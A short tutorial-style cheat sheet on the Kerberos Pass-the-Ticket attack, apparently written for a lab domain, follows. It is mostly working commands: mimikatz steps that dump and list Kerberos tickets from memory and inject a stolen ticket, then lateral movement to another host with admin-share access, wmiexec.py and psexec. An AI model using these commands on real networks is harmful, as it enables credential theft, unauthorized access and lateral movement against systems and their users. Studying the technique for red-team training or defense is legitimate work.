Pass-the-Ticket (PtT) is a Kerberos-based attack where an attacker steals and reuses a valid Kerberos TGT (Ticket Granting Ticket) or TGS (Service Ticket) to access network resources without knowing the user’s password or NTLM hash.
✅ Key Benefit: It bypasses authentication mechanisms because the ticket is already valid.
Tickets are stored in memory and can be extracted using:
mimikatz.exe
sekurlsa::tickets /export
This dumps TGTs and TGSs from the compromised machine.
List all the Kerberos tickets currently available in memory.
kerberos::list
Once you have the ticket, you can load it into memory on another machine:
mimikatz.exe
kerberos::ptt <ticket.kirbi>
kerberos:ptt[0;3e7][email protected]
Now, you can use the ticket as if you were the legitimate user.
After injecting the ticket, you can access resources without re-authenticating:
dir \\\\THEPUNISHER\\C$
wmiexec.py -k -no-pass MARVEL.local/Administrator@THEPUNISHER
psexec.exe \\\\THEPUNISHER cmd.exe